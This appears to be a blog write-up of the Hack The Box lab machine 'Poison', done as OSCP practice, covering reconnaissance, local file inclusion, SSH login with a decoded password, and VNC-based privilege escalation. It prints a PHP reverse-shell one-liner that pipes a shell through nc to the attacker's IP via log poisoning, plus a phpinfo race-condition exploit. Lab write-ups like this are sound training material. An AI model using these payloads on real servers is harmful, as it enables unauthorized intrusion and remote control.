Hack The Box: Poison Write-up (#13)

9 min readAug 27, 2020

This is my 13th box out of 42 boxes. I am doing my best learning and mastering the key skills for my upcoming OSCP exams by writing this series of blogs. Most of the write-up I get help from watching Ippsec’s YouTube videos and reading Rana Khalil’s write-ups. Please feel free to check them out. So let’s begin.

Reconnaissance

Let’s run a full TCP scan.

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.84

-sC: Default Nmap script
-sV: Service/version info
-O: Enable OS detection
-oA: Output scan results in 3 different formats
-p-: Scan all ports from 1–65535

We get the back the following result:

Port 22: — Running OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
Port 80: — Running Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)

...SNIP...
Nmap scan report for 10.10.10.84
Host is up, received user-set (0.23s latency).
Scanned at 2020-08-26 20:58:05 +08 for 13542s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFLpOCLU3rRUdNNbb5u5WlP+JKUpoYw4znHe0n4mRlv5sQ5kkkZSDNMqXtfWUFzevPaLaJboNBOAXjPwd1OV1wL2YFcGsTL5MOXgTeW4ixpxNBsnBj67mPSmQSaWcudPUmhqnT5VhKYLbPk43FsWqGkNhDtbuBVo9/BmN+GjN1v7w54PPtn8wDd7Zap3yStvwRxeq8E0nBE4odsfBhPPC01302RZzkiXymV73WqmI8MeF9W94giTBQS5swH6NgUe4/QV1tOjTct/uzidFx+8bbcwcQ1eUgK5DyRLaEhou7PRlZX6Pg5YgcuQUlYbGjgk6ycMJDuwb2D5mJkAzN4dih
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKXh613KF4mJTcOxbIy/3mN/O/wAYht2Vt4m9PUoQBBSao16RI9B3VYod1HSbx3PYsPpKmqjcT7A/fHggPIzDYU=
|   256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJrg2EBbG5D2maVLhDME5mZwrvlhTXrK7jiEI+MiZ+Am
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8)
....

Similarly, run a full UDP scan.

nmap -sU -O -p- -oA nmap/udp 10.10.10.84

-sU: UDP scan

We get back the following results.

...
514/udp   open|filtered syslog       no-response
...

This port is filtered.

Before we begin, let’s do a quick mental notes.

Port 22 belongs to SSH service. For this version, there is no associated vulnerability to get an initial shell into the system. So we don’t waste our time enumerating this. But one thing I am very sure is this version of OpenSSH 7.2 is running on FreeBSD version 11.X.
Port 80 is running Apache HTTP web service. This is likely to give us an initial shell into the system. We got to enumerate as much as we can.

With this in mind, let’s begin with port 80 service enumeration.

Service Enumeration

Port 80 (HTTP Web Service)

Let’s visit the page.

While I was enumerating this host from the browser, I had an issue accessing this URL with host IP. So I configured port forwarding in Burp proxy from my localhost port 8081 to target port 10.10.10.84 port 80. I will not explain in this post how to configure this. You may watch Ippsec’s YouTube video for Node box. So the message is very obvious, we can call PHP scripts by providing the mentioned script name in the page in the Scriptname field. Let’s test all of them.

We are correct, this box is running on FreeBSD version 11.1. Next check, ini.php.

I am not sure what is this. It just seems to be configuration information stored in an array format. Next, check listfiles.php.

pwdbackup.txt file seems to be very interesting. Let’s test for Local File Inclusion vulnerability (LFI) by providing this file name in Scriptname field.

Nice, we have base64 encoded password. The message says it has been encoded at least 13 times. Copy the content and save in our Kali Linux as pwdbackup.txt. Let’s write a simple bash script to decode this message 13 times.

root@kali:/htb/Poison# cat decode.sh 
#!/bin/bash
state=$(< pwdbackup.txt)
for i in {1..13}; do
   state=$(<<<"$state" base64 --decode)
done
echo "$state"

Give execute permission to the script.

chmod +x decode.sh

Run the script.

./decode.sh

We get the password.

root@kali:/htb/Poison# ./decode.sh 
Charix!2#4%6&8(0

It seems to be SSH password to this box. Let’s check valid system users by abusing LFI vulnerability. Fire up Burp proxy, and intercept the following request and send to Repeater.

We got the system accounts.

Only root and charix have login csh shell. Let’s test this in the next phase.

Exploitation/ Just Log In

So let’s use charix as the username and Charix!2#4%6&8(0 as the password to SSH into the target.

root@kali:/htb/Poison# ssh charix@10.10.10.84
The authenticity of host '10.10.10.84 (10.10.10.84)' can't be established.
ECDSA key fingerprint is SHA256:rhYtpHzkd9nBmOtN7+ft0JiVAu8qnywLb48Glz4jZ8c.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.84' (ECDSA) to the list of known hosts.
Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017Welcome to FreeBSD!
...
charix@Poison:~ % id
uid=1001(charix) gid=1001(charix) groups=1001(charix)

Nice, we got logged in. Grab the user.txt flag.

user.txt

This is one way. There are another 2 ways, 2nd and 3rd ways to get into this box.

Method 2: Log File Poisoning

I believe this is the intended way to exploit this as the name of the box is “Poison”. To exploit this vulnerability, we need to know the log file location in FreeBSD OS and send reverse shell PHP code via request header.

From this site, I know the location of the Apache log file is under /var/log/httpd-access.log. Let’s confirm by using abusing LFI.

Yes, it is the correct path and we have logs output. To confirm the log file poisoning works, we can send a request with User-Agent’s value to something else. Let’s test it out.

Run the following curl command to see the log file’s output to verify out User-Agent written successfully.

curl -kv 10.10.10.84/browse.php?file=/var/log/httpd-access.log

At the end of the result, we can see the entry “I Dont Know” in the User-Agent field.

...SNIP...
rg/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /nmaplowercheck1521462526 HTTP/1.1" 404 222 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.1" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /HNAP1 HTTP/1.1" 404 203 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.9 - - [27/Aug/2020:12:18:47 +0200] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 879 "-" "curl/7.68.0"
10.10.14.9 - - [27/Aug/2020:12:19:14 +0200] "GET /NotSure HTTP/1.1" 404 205 "http://127.0.0.1:8081/" "I+Dont+Know"
* Connection #0 to host 10.10.10.84 left intact

Since we have complete control over the User-Agent, we can change it to PHP reverse shell.

Now, intercept the request in Burp proxy and change the User-Agent value to PHP onliner reverse shell from Pentestmonkey.

<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|
nc 10.10.14.9 53 >/tmp/f') ?>

Set a Netcat listener

nc -nlvp 53

Forward the request so that it will be log in the log file and call the log file using LFI vulnerability.

We get a reverse shell.

Method 3: phpinfo.php Race Condition

There is a research article about this vulnerability released in the year 2011, you can find here. To exploit this vulnerability we need these 2 conditions.

file_uploads functionality is enabled in PHP configuration.
LFI vulnerability to call the file that uploaded via #1.

From the enumeration phase, we know the 2nd condition is satisfied. Let’s confirm the 1st condition by calling the phpinfo.php file.

Condition #1 also satisfied. Now download the exploit script from here. We need to modify the script to include our PHP reverse shell. In Kali, there is PHP reverse shell available copy the content and replace the content of payload value in the exploit code.

/usr/share/webshells/php/php-reverse-shell.php

Make sure to change the IP address and port number. Next, change the LFIREG parameter value as below.

LFIREQ="""GET /browse.php?file=%s

The last thing to modify is all “=>” to “=&gt” for the script to interpret properly.

With all that in place, let’s set up a Netcat listener in our Kali.

nc -nlvp 53

Run the script.

python phpinfolfi.py 10.10.10.84 80

We get a reverse shell.

Privilege Escalation

Since this box is running FreeBSD our linux-smart-enumeration script will not work here. So we need to do manual enumeration to find a way to escalate privilege to root. Under /home/charis directory we have a file called secret.zip.

charix@Poison:~ % ls -l
total 8
-rw-r-----  1 root  charix  166 Mar 19  2018 secret.zip
-rw-r-----  1 root  charix   33 Mar 19  2018 user.txt

Copy over the file to Kali Linux using SCP command.

scp charix@10.10.14.9:secret.zip .

Unzip the file

unzip secret.xip

Enter the same password we recovered earlier.

root@kali:/htb/Poison# unzip secret.zip 
Archive:  secret.zip
[secret.zip] secret password: 
 extracting: secret                  
root@kali:/htb/Poison# ls -l secret
-r--r--r-- 1 root root 8 Jan 24  2018 secret

We get a file name secret. Check the file type.

root@kali:/htb/Poison# file secret
secret: Non-ISO extended-ASCII text, with no line terminators

If we check the content of this file it all garbage.

root@kali:/htb/Poison# cat secret
��[|Ֆz!

Next, check the processes in the target system.

ps aux

We have a root process running vnc which is unique.

Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthor

Let’s check the details of the process information.

charix@Poison:~ % ps -auxww | grep vnc
root   529  0.0  0.9  23620  8872 v0- I    14:27    0:00.02 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1

Its running TightVNC with the flag -rfbport 5901 which is port on localhost.

We can verify using a netstat command.

charix@Poison:~ % netstat -an | grep 5901
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN

To access VNC which is a graphical user interface, we need local port forwarding.

ssh -L 8000:127.0.0.1:5901 charix@10.10.10.84

The above command will connect to the target machine with our Kali Linux local port 8000 binds to target localhost port 5901. Once connection established, we can access to target VNC service from our Kali Linux port 8000. Let’s execute the command above and verify our Kali Linux listening on port 8000.

root@kali:/htb/Poison# netstat -tulpn | grep 8000
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      37636/ssh           
tcp6       0      0 ::1:8000                :::*                    LISTEN      37636/ssh

With port forwarding in place, let’s connect to VNC service.

joshuaspy@kali:~$ vncviewer 127.0.0.1:8000
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Password:

It prompts for a password, I tried the password of user charix but it didn’t work for me. A quick Google search for vncviewer password for FreeBSD brought me to FreeBSD man page where o connect vncviewer with a password we need to provide the password file.

I remember the secret file we obtained by decompressing secret.zip is the password file.

Let’s test it out.

vncviewer 127.0.0.1:8000 -passwd secret

We are in! Grab the root.txt flag

root.txt flag

A quick Google search for decrypt the VNC password file leads me to this GitHub page.

Download the repo and compile the code using make and should see the vncpwd executable file.

root@kali:/htb/Poison# cd /opt/vncpwd/
root@kali:/opt/vncpwd# make
gcc -Wall -g -o vncpwd vncpwd.c d3des.c
root@kali:/opt/vncpwd# ll
total 116K
-rw-r--r-- 1 root root 1.5K Aug 27 22:32 vncpwd.c
-rw-r--r-- 1 root root  877 Aug 27 22:32 README
-rw-r--r-- 1 root root  185 Aug 27 22:32 Makefile
-rw-r--r-- 1 root root  35K Aug 27 22:32 LICENSE
-rw-r--r-- 1 root root 4.8K Aug 27 22:32 d3des.h
-rw-r--r-- 1 root root  21K Aug 27 22:32 d3des.c
-rwxr-xr-x 1 root root  36K Aug 27 22:33 vncpwd

Now run the command vncpwd.

root@kali:/opt/vncpwd# ./vncpwd 
Usage: vncpwd <password file>

Run again with the secret password file.

root@kali:/opt/vncpwd# ./vncpwd /htb/Poison/secret
Password: VNCP@$$!

We got the password recovered.

Attack Strategy Map

I have summarized the entire attack strategy on this map.

Thank you for reading :-) Next box is Sunday.